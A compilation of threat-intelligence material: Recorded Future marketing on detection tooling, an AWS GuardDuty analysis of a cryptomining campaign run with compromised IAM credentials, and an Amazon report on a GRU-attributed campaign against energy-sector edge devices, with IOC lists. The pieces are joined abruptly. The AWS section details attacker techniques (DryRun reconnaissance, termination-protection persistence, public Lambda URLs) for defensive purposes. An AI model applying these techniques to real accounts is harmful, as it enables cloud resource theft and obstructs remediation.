Essential Digital Threat Detection Tools and Technologies
Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.
Threat Intelligence Platforms: The Engines of Context
No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.
Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:
Open web reporting
Underground forums
Dark web marketplaces
Malware sandboxes
Threat feeds
Researcher data
Once the data is normalized, the platform enriches it with context, such as:
Relationships between indicators
Associations with known threat actors
Infrastructure reuse
Activity targeting specific industries or regions
This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.
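As a concrete sketch of that enrichment step, the Python snippet below uses a toy in-memory knowledge base; the field names, values, and risk threshold are illustrative assumptions, not any vendor's actual schema:

```python
# Hypothetical sketch of threat intelligence enrichment: raw indicators in,
# context-rich records out. All data and field names here are illustrative.

RAW_INDICATORS = [
    {"type": "domain", "value": "vc2.b1ack.cat"},
    {"type": "ip", "value": "196.251.116.232"},
]

# A toy "knowledge base" standing in for normalized data from many sources.
KNOWN_CONTEXT = {
    "vc2.b1ack.cat": {"campaign": "Mythic C2 staging", "risk": 95},
    "196.251.116.232": {"campaign": "Mythic C2 staging", "risk": 90},
}

def enrich(indicator: dict) -> dict:
    """Attach relationship and scoring context to a bare indicator."""
    context = KNOWN_CONTEXT.get(indicator["value"], {"risk": 0})
    # The 65 cutoff is an arbitrary example threshold for "actionable".
    return {**indicator, **context, "actionable": context.get("risk", 0) >= 65}

enriched = [enrich(i) for i in RAW_INDICATORS]
```

The point of the sketch is the shape of the transformation: an isolated artifact becomes a record that carries campaign association and a priority signal an analyst can act on.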
Security Orchestration, Automation, and Response (SOAR)
While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.
Key SOAR capabilities include:
Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
Initiating takedown workflows for harmful domains or impersonation infrastructure
Coordinating actions across multiple security tools to ensure a unified response
Documenting each step of the investigation for reporting and compliance
By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.
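A minimal Python sketch of such a playbook follows; the risk thresholds and action names are assumptions for illustration and do not correspond to any real SOAR product's API:

```python
# Toy SOAR-style playbook: enrich an alert with an intelligence risk score,
# then choose a response action. Thresholds and action names are invented.

def playbook(alert: dict, intel_risk: dict) -> str:
    """Return the automated action for an alert based on enriched risk."""
    risk = intel_risk.get(alert["indicator"], 0)
    alert["risk"] = risk  # enrichment step: score is attached to the alert
    if risk >= 90:
        return "block_indicator_and_open_incident"
    if risk >= 65:
        return "escalate_to_analyst"
    return "log_and_close"

# Example: a high-risk indicator triggers blocking without analyst delay.
intel = {"vc2.b1ack.cat": 95, "example.com": 10}
action = playbook({"indicator": "vc2.b1ack.cat"}, intel)
```

The routing logic is trivial on purpose: the value of SOAR is that this decision runs consistently on every alert, not that any individual decision is complex.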
Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration
EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.
EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.
Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.
Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.
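In its most basic form, the correlation described above reduces to checking internal telemetry against a set of known-bad indicators. This Python sketch uses invented event fields and example infrastructure; real SIEM/EDR correlation is far richer:

```python
# Toy correlation of internal telemetry with external threat intelligence:
# flag any event whose destination matches a known malicious indicator.
# Event fields and the indicator set are invented for illustration.

MALICIOUS = {"196.251.116.232", "vc2.b1ack.cat"}

events = [
    {"host": "web-01", "dest": "203.0.113.10"},      # benign documentation IP
    {"host": "web-02", "dest": "196.251.116.232"},   # matches threat intel
]

hits = [e for e in events if e["dest"] in MALICIOUS]
```

Intelligence quality is what makes this useful: a stale or noisy indicator set turns the same mechanism into a false-positive generator.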
Overcoming the Analyst’s Biggest Pain Points
Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.
The Drain of Alert Fatigue and False Positives
High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.
The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.
The Blind Spots of External Risk
Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.
These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.
Recorded Future: Operationalizing Digital Threat Intelligence at Scale
Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.
Real-Time Context from the Intelligence Graph®
The Intelligence Graph® addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:
Open web
Dark web marketplaces
Malware repositories
Technical feeds
Network telemetry
Closed underground forums
No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence Graph® solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.
Comprehensive Digital Risk Protection for External Threats
Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.
Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.
Accelerating Time-to-Action through Integrated Intelligence
Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.
An extensive ecosystem of pre-built integrations and flexible APIs connects directly with every major SIEM, SOAR, and EDR platform, feeding in enriched threat context, dynamic Risk Scores, and prioritized intelligence.
Collective Insights® adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.
This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques, and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.
Smarter, Faster Security Decisions
Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.
By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.
These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.
Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.
Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.
Card testing signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning indicators that preceded the final malicious transaction.
Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.
Amazon GuardDuty and our automated security monitoring systems identified an ongoing cryptocurrency (crypto) mining campaign beginning on November 2, 2025. The operation uses compromised AWS Identity and Access Management (IAM) credentials to target Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Compute Cloud (Amazon EC2). GuardDuty Extended Threat Detection correlated signals across these data sources to raise a critical severity attack sequence finding. Using the advanced threat intelligence capabilities and existing detection mechanisms of Amazon Web Services (AWS), GuardDuty proactively identified this campaign and quickly alerted customers to the threat. AWS is sharing relevant findings and mitigation guidance to help customers take appropriate action.
It’s important to note that these actions don’t take advantage of a vulnerability within an AWS service but rather require valid credentials that an unauthorized user uses in an unintended way. Although these actions occur in the customer domain of the shared responsibility model, AWS recommends steps that customers can use to detect, prevent, or reduce the impact of such activity.
Understanding the crypto mining campaign
The recently detected crypto mining campaign employed a novel persistence technique designed to disrupt incident response and extend mining operations. The ongoing campaign was originally identified when GuardDuty security engineers discovered similar attack techniques being used across multiple AWS customer accounts, indicating a coordinated campaign targeting customers using compromised IAM credentials.
Operating from an external hosting provider, the threat actor quickly enumerated Amazon EC2 service quotas and IAM permissions before deploying crypto mining resources across Amazon EC2 and Amazon ECS. Within 10 minutes of the threat actor gaining initial access, crypto miners were operational.
A key technique observed in this attack was the use of ModifyInstanceAttribute to set the disableApiTermination attribute to true, forcing victims to re-enable API termination before they could delete the impacted resources. Enabling instance termination protection this way adds an additional consideration for incident responders and can disrupt automated remediation controls. The threat actor’s scripted use of multiple compute services, in combination with emerging persistence techniques, represents an advancement in crypto mining persistence methodologies that security teams should be aware of.
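The remediation order this technique forces can be sketched in Python as follows. The helper that builds the call sequence is pure (so it can be inspected offline); the boto3 calls it corresponds to are shown for reference, and the instance ID is a placeholder:

```python
# Sketch of remediating an instance protected with DisableApiTermination=true:
# the attribute must be flipped back before termination will succeed.

def build_remediation_steps(instance_id: str) -> list:
    """Return the ordered EC2 API calls needed to remove the instance."""
    return [
        ("ModifyInstanceAttribute",
         {"InstanceId": instance_id, "DisableApiTermination": {"Value": False}}),
        ("TerminateInstances", {"InstanceIds": [instance_id]}),
    ]

def remediate(instance_id: str) -> None:
    """Execute the steps with boto3 (requires AWS credentials; not run here)."""
    import boto3  # imported lazily so the sketch loads without boto3 installed
    ec2 = boto3.client("ec2")
    ec2.modify_instance_attribute(
        InstanceId=instance_id, DisableApiTermination={"Value": False})
    ec2.terminate_instances(InstanceIds=[instance_id])

steps = build_remediation_steps("i-0123456789abcdef0")
```

Automated containment runbooks that only call TerminateInstances will fail against this technique, which is exactly the disruption the attacker is counting on.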
GuardDuty’s multiple detection capabilities successfully identified the malicious activity through EC2 domain/IP threat intelligence, anomaly detection, and Extended Threat Detection EC2 attack sequences. GuardDuty Extended Threat Detection correlated these signals into an AttackSequence:EC2/CompromisedInstanceGroup finding.
Indicators of compromise (IoCs)
Security teams should monitor for the following indicators to identify this crypto mining campaign. Threat actors frequently modify their tactics and techniques, so these indicators might evolve over time:
Malicious container image – The Docker Hub image yenik65958/secret, created on October 29, 2025, with over 100,000 pulls, was used to deploy crypto miners to containerized environments. This malicious image contained an SBRMiner-MULTI binary for crypto mining. This specific image has been taken down from Docker Hub, but threat actors might deploy similar images under different names.
Automation and tooling – AWS SDK for Python (Boto3) user agent patterns indicating Python-based automation scripts were used across the entire attack chain.
Crypto mining domains – asia[.]rplant[.]xyz, eu[.]rplant[.]xyz, and na[.]rplant[.]xyz.
Infrastructure naming patterns – Auto scaling groups followed specific naming conventions: SPOT-us-east-1-G*-* for spot instances and OD-us-east-1-G*-* for on-demand instances, where G indicates the group number.
Attack chain analysis
The crypto mining campaign followed a systematic attack progression across multiple phases. Sensitive fields in this post were given fictitious values to protect personally identifiable information (PII).
Figure 1: Cryptocurrency mining campaign diagram
Initial access, discovery, and attack preparation
The attack began when compromised IAM user credentials with admin-like privileges were used from an anomalous network and location, triggering GuardDuty anomaly detection findings. During the discovery phase, the attacker systematically probed customer AWS environments to understand what resources they could deploy. They checked Amazon EC2 service quotas (GetServiceQuota) to determine how many instances they could launch, then tested their permissions by calling the RunInstances API multiple times with the DryRun flag enabled.
The DryRun flag was a deliberate reconnaissance tactic that allowed the actor to validate their IAM permissions without actually launching instances, avoiding costs and reducing their detection footprint. This technique demonstrates the threat actor was validating their ability to deploy crypto mining infrastructure before acting. Organizations that don’t typically use DryRun flags in their environments should consider monitoring for this API pattern as an early warning indicator of compromise. AWS CloudTrail logs can be used with Amazon CloudWatch alarms, Amazon EventBridge, or your third-party tooling to alert on these suspicious API patterns.
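One way to alert on this pattern is an Amazon EventBridge rule over CloudTrail-delivered EC2 events. The sketch below is a minimal, hedged example: it assumes DryRun RunInstances calls surface in CloudTrail with the error code Client.DryRunOperation, which is how the EC2 API typically reports a successful dry run.

```python
import json

# Hedged sketch of an EventBridge event pattern that matches CloudTrail-delivered
# RunInstances calls rejected only because DryRun was set. The error code
# "Client.DryRunOperation" is how a permitted dry-run call is typically recorded.
dry_run_pattern = {
    "source": ["aws.ec2"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
        "eventSource": ["ec2.amazonaws.com"],
        "eventName": ["RunInstances"],
        "errorCode": ["Client.DryRunOperation"],
    },
}

# This JSON document is what you would supply as the rule's event pattern.
print(json.dumps(dry_run_pattern, indent=2))
```

A rule using this pattern can route matches to an SNS topic or a triage Lambda function; tune it out for accounts where automation legitimately uses DryRun.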
The threat actor called two APIs to create IAM roles as part of their attack infrastructure: CreateServiceLinkedRole to create a role for auto scaling groups and CreateRole to create a role for AWS Lambda. They then attached the AWSLambdaBasicExecutionRole policy to the Lambda role. These two roles were integral to the impact and persistence stages of the attack.
Amazon ECS impact
The threat actor first created dozens of ECS clusters across the environment, sometimes exceeding 50 clusters in a single attack. They then called RegisterTaskDefinition with the malicious Docker Hub image yenik65958/secret:user. Reusing the same name string from cluster creation, the actor created a service that used the task definition to initiate crypto mining on AWS Fargate capacity. The following is an example of API request parameters for RegisterTaskDefinition with a maximum CPU allocation of 16,384 units.
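The captured request parameters are not reproduced here; the following is an illustrative reconstruction only. The family name, container name, and memory value are assumptions; the image reference and the 16,384-unit (16 vCPU) CPU allocation are the details described above.

```python
import json

# Illustrative reconstruction (not the actual captured request) of
# RegisterTaskDefinition parameters matching the described behavior.
task_definition = {
    "family": "example-family",          # hypothetical; real family name not disclosed
    "requiresCompatibilities": ["FARGATE"],
    "networkMode": "awsvpc",
    "cpu": "16384",                       # maximum Fargate CPU allocation (16 vCPU)
    "memory": "65536",                    # assumed; Fargate requires a memory value valid for 16 vCPU
    "containerDefinitions": [
        {
            "name": "miner",              # hypothetical container name
            "image": "yenik65958/secret:user",  # malicious Docker Hub image
            "essential": True,
        }
    ],
}

print(json.dumps(task_definition, indent=2))
```

Unusually large CPU allocations like this in task definitions are themselves a useful detection signal, as noted in the recommendations later in this post.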
Figure 2: Contents of the cryptocurrency mining script within the malicious image
The malicious image (yenik65958/secret:user) was configured to execute run.sh after deployment. run.sh runs the randomvirel mining algorithm against the mining pools asia|eu|na[.]rplant[.]xyz:17155. The use of nproc --all indicates that the script uses all available processor cores.
Amazon EC2 impact
The actor created two launch templates (CreateLaunchTemplate) and 14 auto scaling groups (CreateAutoScalingGroup) configured with aggressive scaling parameters, including a maximum size of 999 instances and desired capacity of 20. The following example of request parameters from CreateLaunchTemplate shows the UserData was supplied, instructing the instances to begin crypto mining.
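The original UserData is not reproduced here. As a hedged sketch with hypothetical names and a placeholder bootstrap script standing in for the mining commands, the CreateLaunchTemplate parameters could look like the following.

```python
import base64
import json

# Placeholder standing in for the actor's mining bootstrap commands (not the
# actual script). EC2 runs UserData at first boot, which is how the instances
# were instructed to begin mining.
user_data = base64.b64encode(b"#!/bin/bash\n# <mining bootstrap removed>\n").decode()

# Hypothetical reconstruction of the CreateLaunchTemplate request parameters.
launch_template = {
    "LaunchTemplateName": "example-template",   # hypothetical name
    "LaunchTemplateData": {
        "InstanceType": "g4dn.xlarge",          # one of the GPU families targeted
        "UserData": user_data,                  # base64-encoded per the EC2 API
    },
}

print(json.dumps(launch_template, indent=2))
```

Auditing launch templates for unexpected UserData is a practical response step, since every instance the auto scaling groups launch inherits this bootstrap.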
The threat actor created auto scaling groups using both Spot and On-Demand Instances to draw on both sets of Amazon EC2 service quotas and maximize resource consumption.
Spot Instance groups:
Targeted high-performance GPU and machine learning (ML) instance families (g4dn, g5, p3, p4d, inf1)
Configured with 0% on-demand allocation and capacity-optimized strategy
After exhausting auto scaling quotas, the actor directly launched additional EC2 instances using RunInstances to consume the remaining EC2 instance quota.
Persistence
An interesting technique observed in this campaign was the threat actor’s use of ModifyInstanceAttribute across all launched EC2 instances to disable API termination. Although instance termination protection prevents accidental termination of the instance, it adds an additional consideration for incident response capabilities and can disrupt automated remediation controls. The following example shows request parameters for the API ModifyInstanceAttribute.
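The referenced request parameters take roughly the following shape (the instance ID is a placeholder): a single boolean attribute flips termination protection on for a running instance.

```python
import json

# ModifyInstanceAttribute request parameters as described: enabling termination
# protection so TerminateInstances calls fail until it is switched back off.
modify_attribute = {
    "InstanceId": "i-0123456789abcdef0",        # placeholder instance ID
    "DisableApiTermination": {"Value": True},   # True = termination protection ON
}

print(json.dumps(modify_attribute, indent=2))
```

The actor issued this call per launched instance, which is why responders must first reverse the attribute before cleanup can proceed.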
After all mining workloads were deployed, the actor created a Lambda function with a configuration that bypasses IAM authentication and creates a public Lambda endpoint. The threat actor then added a permission to the Lambda function that allows the principal to invoke the function. The following examples show CreateFunctionUrlConfig and AddPermission request parameters.
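The examples below are a hedged reconstruction of those two calls, not the captured requests. The function name and statement ID are placeholders; the key details are an AuthType of NONE (no IAM authentication on the function URL) and a permission statement opening invocation broadly, which together produce a publicly invocable endpoint.

```python
import json

# Reconstruction of the CreateFunctionUrlConfig call: AuthType NONE creates a
# public URL with no IAM authentication.
create_function_url_config = {
    "FunctionName": "example-function",   # placeholder
    "AuthType": "NONE",
}

# Reconstruction of the matching AddPermission call. Principal "*" is an
# assumption consistent with an unauthenticated public endpoint.
add_permission = {
    "FunctionName": "example-function",   # placeholder
    "StatementId": "public-invoke",       # placeholder
    "Action": "lambda:InvokeFunctionUrl",
    "Principal": "*",
    "FunctionUrlAuthType": "NONE",
}

print(json.dumps([create_function_url_config, add_permission], indent=2))
```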
To prevent public Lambda URLs from being created, organizations can deploy service control policies (SCPs) that deny creation or updating of Lambda URLs with an AuthType of “NONE”.
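Such an SCP can be sketched as follows, using the lambda:FunctionUrlAuthType condition key to deny both creation and update of unauthenticated function URLs across the organization.

```python
import json

# Minimal SCP sketch: deny creating or updating a Lambda function URL whose
# AuthType is NONE anywhere the policy is attached.
scp = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyPublicLambdaUrls",
            "Effect": "Deny",
            "Action": [
                "lambda:CreateFunctionUrlConfig",
                "lambda:UpdateFunctionUrlConfig",
            ],
            "Resource": "*",
            "Condition": {
                "StringEquals": {"lambda:FunctionUrlAuthType": "NONE"}
            },
        }
    ],
}

print(json.dumps(scp, indent=2))
```

Attach the policy at the organization root or a target OU; legitimate public endpoints, if any, would then need an explicit exception.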
The multilayered detection approach of GuardDuty proved highly effective in identifying all stages of the attack chain using threat intelligence, anomaly detection, and the recently launched Extended Threat Detection capabilities for EC2 and ECS.
Next, we walk through the details of these features and how you can deploy them to detect attacks such as these. You can enable the GuardDuty foundational protection plan to receive alerts on crypto mining campaigns like the one described in this post. To further enhance detection capabilities, we highly recommend enabling GuardDuty Runtime Monitoring, which will extend finding coverage to system-level events on Amazon EC2, Amazon ECS, and Amazon Elastic Kubernetes Service (Amazon EKS).
GuardDuty EC2 findings
Threat intelligence findings for Amazon EC2 are part of the GuardDuty foundational protection plan, which will alert you to suspicious network behaviors involving your instances. These behaviors can include brute force attempts, connections to malicious or crypto domains, and other suspicious behaviors. Using third-party threat intelligence and internal threat intelligence, including active threat defense and MadPot, GuardDuty provides detection over the indicators in this post through the following findings: CryptoCurrency:EC2/BitcoinTool.B and CryptoCurrency:EC2/BitcoinTool.B!DNS.
GuardDuty IAM findings
The IAMUser/AnomalousBehavior findings spanning multiple tactic categories (PrivilegeEscalation, Impact, Discovery) showcase the ML capability of GuardDuty to detect deviations from normal user behavior. In the incident described in this post, the compromised credentials were detected due to the threat actor using them from an anomalous network and location and calling APIs that were unusual for the accounts.
GuardDuty Runtime Monitoring
GuardDuty Runtime Monitoring is an important component for Extended Threat Detection attack sequence correlation. Runtime Monitoring provides host-level signals, such as operating system visibility, and extends detection coverage by analyzing system-level logs that indicate malicious process execution at the host and container level, including the execution of crypto mining programs on your workloads. The CryptoCurrency:Runtime/BitcoinTool.B!DNS and CryptoCurrency:Runtime/BitcoinTool.B findings detect network connections to crypto-related domains and IPs, while the Impact:Runtime/CryptoMinerExecuted finding detects when a running process is associated with cryptocurrency mining activity.
GuardDuty Extended Threat Detection
Launched at re:Invent 2025, the AttackSequence:EC2/CompromisedInstanceGroup finding represents one of the latest Extended Threat Detection capabilities in GuardDuty. This feature uses AI and ML algorithms to automatically correlate security signals across multiple data sources to detect sophisticated attack patterns against EC2 resource groups. Although AttackSequences for EC2 are included in the GuardDuty foundational protection plan, we strongly recommend enabling Runtime Monitoring. Runtime Monitoring provides key insights and signals from compute environments, enabling detection of suspicious host-level activities and improving correlation of attack sequences. For AttackSequence:ECS/CompromisedCluster attack sequences, Runtime Monitoring is required to correlate container-level activity.
Monitoring and remediation recommendations
To protect against similar crypto mining attacks, AWS customers should prioritize strong identity and access management controls. Implement temporary credentials instead of long-term access keys, enforce multi-factor authentication (MFA) for all users, and apply least privilege to IAM principals limiting access to only required permissions. You can use AWS CloudTrail to log events across AWS services and combine logs into a single account to make them available to your security teams to access and monitor. To learn more, refer to Receiving CloudTrail log files from multiple accounts in the CloudTrail documentation.
Confirm GuardDuty is enabled across all accounts and Regions with Runtime Monitoring enabled for comprehensive coverage. Integrate GuardDuty with AWS Security Hub and Amazon EventBridge or third-party tooling to enable automated response workflows and rapid remediation of high-severity findings. Implement container security controls, including image scanning policies and monitoring for unusual CPU allocation requests in ECS task definitions. Finally, establish specific incident response procedures for crypto mining attacks, including documented steps to handle instances with disabled API termination—a technique used by this attacker to complicate remediation efforts.
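The documented response steps for instances with disabled API termination can be sketched as an ordered call sequence (instance ID hypothetical): first reverse the attribute the attacker set, then terminate. The helper below returns the sequence as data rather than calling AWS, so the ordering can be inspected and tested; in practice each tuple maps to the corresponding EC2 API call.

```python
def remediation_calls(instance_id: str):
    """Return the ordered (API name, request parameters) sequence a responder
    would issue to remove an instance whose termination protection was enabled
    by the attacker. Ordering matters: TerminateInstances fails while
    DisableApiTermination is still true."""
    return [
        # Step 1: turn termination protection back off.
        ("ModifyInstanceAttribute",
         {"InstanceId": instance_id,
          "DisableApiTermination": {"Value": False}}),
        # Step 2: termination now succeeds.
        ("TerminateInstances", {"InstanceIds": [instance_id]}),
    ]

calls = remediation_calls("i-0123456789abcdef0")  # placeholder instance ID
for api, params in calls:
    print(api, params)
```

Baking this two-step ordering into automated remediation (for example, a Lambda function triggered by the GuardDuty finding) prevents the attacker's persistence technique from stalling cleanup.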
As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot in which what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes (credential harvesting and lateral movement into victim organizations’ online services and infrastructure) while reducing the actor’s exposure and resource expenditure.
Going into 2026, organizations must prioritize securing their network edge devices and monitoring for credential replay attacks to defend against this persistent threat. Based on infrastructure overlaps with known Sandworm (also known as APT44 and Seashell Blizzard) operations observed in Amazon’s telemetry and consistent targeting patterns, we assess with high confidence this activity cluster is associated with Russia’s Main Intelligence Directorate (GRU). The campaign demonstrates sustained focus on Western critical infrastructure, particularly the energy sector, with operations spanning 2021 through the present day.
Technical details
Campaign scope and targeting: Amazon Threat Intelligence observed sustained targeting of global infrastructure between 2021 and 2025, with particular focus on the energy sector. The campaign demonstrates a clear evolution in tactics.
2022-2023: Confluence vulnerability exploitation (CVE-2021-26084, CVE-2023-22518); continued misconfigured device targeting
2024: Veeam exploitation (CVE-2023-27532); continued misconfigured device targeting
2025: Sustained targeting of misconfigured customer network edge devices; decline in N-day/zero-day exploitation activity
Primary targets:
Energy sector organizations across Western nations
Critical infrastructure providers in North America and Europe
Organizations with cloud-hosted network infrastructure
Commonly targeted resources:
Enterprise routers and routing infrastructure
VPN concentrators and remote access gateways
Network management appliances
Collaboration and wiki platforms
Cloud-based project management systems
Targeting the “low-hanging fruit” of likely misconfigured customer devices with exposed management interfaces achieves the same strategic objectives: persistent access to critical infrastructure networks and credential harvesting for accessing victim organizations’ online services. The threat actor’s shift in operational tempo represents a concerning evolution: while customer misconfiguration targeting has been ongoing since at least 2022, the actor maintained sustained focus on this activity in 2025 while reducing investment in zero-day and N-day exploitation. The actor accomplishes this while significantly reducing the risk of exposing their operations through more detectable vulnerability exploitation activity.
Credential harvesting operations
While we did not directly observe the victim organization credential extraction mechanism, multiple indicators point to packet capture and traffic analysis as the primary collection method:
Temporal analysis: Time gap between device compromise and authentication attempts against victim services suggests passive collection rather than active credential theft
Credential type: Use of victim organization credentials (not device credentials) for accessing online services indicates interception of user authentication traffic
Known tradecraft: Sandworm operations consistently involve network traffic interception capabilities
Strategic positioning: Targeting of customer network edge devices specifically positions the actor to intercept credentials in transit
Infrastructure targeting
Compromise of infrastructure hosted on AWS: Amazon’s telemetry reveals coordinated operations against customer network edge devices hosted on AWS. This was not due to a weakness in AWS; these appear to be customer misconfigured devices. Network connection analysis shows actor-controlled IP addresses establishing persistent connections to compromised EC2 instances operating customers’ network appliance software. Analysis revealed persistent connections consistent with interactive access and data retrieval across multiple affected instances.
Credential replay operations: Beyond direct victim infrastructure compromise, we observed systematic credential replay attacks against victim organizations’ online services. In observed instances, the actor compromised customer network edge devices hosted on AWS, then subsequently attempted authentication using credentials associated with the victim organization’s domain against their online services. While these specific attempts were unsuccessful, the pattern of device compromise followed by authentication attempts using victim credentials supports our assessment that the actor harvests credentials from compromised customer network infrastructure for replay against target organizations’ online services. Actor infrastructure accessed victims’ authentication endpoints for multiple organizations across critical sectors through 2025, including:
Energy sector: Electric utility organizations, energy providers, and managed security service providers specializing in energy sector clients
Telecommunications: Telecom providers across multiple regions
Geographic distribution: The targeting demonstrates global reach:
North America
Europe (Western and Eastern)
Middle East
The targeting demonstrates sustained focus on the energy sector supply chain, including both direct operators and third-party service providers with access to critical infrastructure networks.
Campaign flow:
Compromise customer network edge device hosted on AWS.
Leverage native packet capture capability.
Harvest credentials from intercepted traffic.
Replay credentials against victim organizations’ online services and infrastructure.
Establish persistent access for lateral movement.
Infrastructure overlap with “Curly COMrades”
Amazon Threat Intelligence identified threat actor infrastructure overlap with a group that Bitdefender tracks as “Curly COMrades.” We assess these may represent complementary operations within a broader GRU campaign:
Amazon’s telemetry: Initial access vectors and cloud pivot methodology
This potential operational division, where one cluster focuses on network access and initial compromise while another handles host-based persistence and evasion, aligns with GRU operational patterns of specialized subclusters supporting broader campaign objectives.
Amazon’s response and disruption
Amazon remains committed to helping protect customers and the broader internet ecosystem by actively investigating and disrupting sophisticated threat actors.
Immediate response actions:
Identified and notified affected customers of compromised network appliance resources
Enabled immediate remediation of compromised EC2 instances
Shared intelligence with industry partners and affected vendors
Reported observations to network appliance vendors to help support security investigations
Disruption impact: Through coordinated efforts, since our discovery of this activity, we have disrupted active threat actor operations and reduced the attack surface available to this threat activity subcluster. We will continue working with the security community to share intelligence and collectively defend against state-sponsored threats targeting critical infrastructure.
Defending your organization
Immediate priority actions for 2026
Organizations should proactively monitor for evidence of this activity pattern:
1. Network edge device audit
Audit all network edge devices for unexpected packet capture files or utilities.
Review device configurations for exposed management interfaces.
Implement network segmentation to isolate management interfaces.
2. Credential replay monitoring
Review authentication logs for credential reuse between network device management interfaces and online services.
Monitor for authentication attempts from unexpected geographic locations.
Implement anomaly detection for authentication patterns across your organization’s online services.
Review extended time windows following any suspected device compromise for delayed credential replay attempts.
3. Access monitoring
Monitor for interactive sessions to router/appliance administration portals from unexpected source IPs.
Examine whether network device management interfaces are inadvertently exposed to the internet.
Audit for plain text protocol usage (Telnet, HTTP, unencrypted SNMP) that could expose credentials.
4. IOC review
Energy sector organizations and critical infrastructure operators should prioritize reviewing access logs for authentication attempts from the IOCs listed below.
AWS-specific recommendations
For AWS environments, implement these protective measures:
Identity and access management:
Manage access to AWS resources and APIs using identity federation with an identity provider and IAM roles whenever possible.
Regularly patch, update, and secure the operating system and applications on your instances.
Detection and monitoring:
Enable AWS CloudTrail for API activity monitoring.
Configure Amazon GuardDuty for threat detection.
Review authentication logs for credential replay patterns.
Indicators of Compromise (IOCs)
IOC Value | IOC Type | First Seen | Last Seen | Annotation
91.99.25[.]54 | IPv4 | 2025-07-02 | Present | Compromised legitimate server used to proxy threat actor traffic
185.66.141[.]145 | IPv4 | 2025-01-10 | 2025-08-22 | Compromised legitimate server used to proxy threat actor traffic
51.91.101[.]177 | IPv4 | 2024-02-01 | 2024-08-28 | Compromised legitimate server used to proxy threat actor traffic
212.47.226[.]64 | IPv4 | 2024-10-10 | 2024-11-06 | Compromised legitimate server used to proxy threat actor traffic
213.152.3[.]110 | IPv4 | 2023-05-31 | 2024-09-23 | Compromised legitimate server used to proxy threat actor traffic
